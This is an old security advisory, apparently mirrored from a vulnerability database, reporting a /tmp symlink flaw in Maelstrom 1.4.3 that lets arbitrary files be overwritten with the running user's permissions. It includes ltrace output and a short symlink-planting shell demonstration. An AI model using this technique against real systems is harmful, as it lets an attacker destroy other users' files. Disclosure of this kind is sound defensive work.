Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:2389
HistoryJan 21, 2002 - 12:00 a.m.

Maelstrom 1.4.3 abartity file overwrite

2002-01-2100:00:00
vulners.com
7
JSON

Program: Maelstrom
Version: 1.4.3
Distribution: RedHat 7.1

When trying to break stuff, ltracing Maelstrom showed the following:

fopen("/tmp/f", "w") = 0x08081f58
fprintf(0x08081f58, "Main program = %s\n", "Maelstrom") = 25
fclose(0x08081f58) = 0

Which made we wonder if it followed symbolic links, by doing

[andrewg@blackhole andrewg]$ rm -f /tmp/f; (umask 077; echo bla > /tmp/bla; \
ln -s /tmp/bla f)

at which point I ran it again, and when I did cat /tmp/bla, I got

Main program = Maelstrom

Conclusion:
-=-=-=-=-=-

You can overwrite arbitrary files with the permissions of the user who ran
it.

Of course, this won't work on systems that have linking restrictions in /tmp.

Fixing it
-=-=-=-=-

Remove the code that does the above.


www.tasmail.com

JSON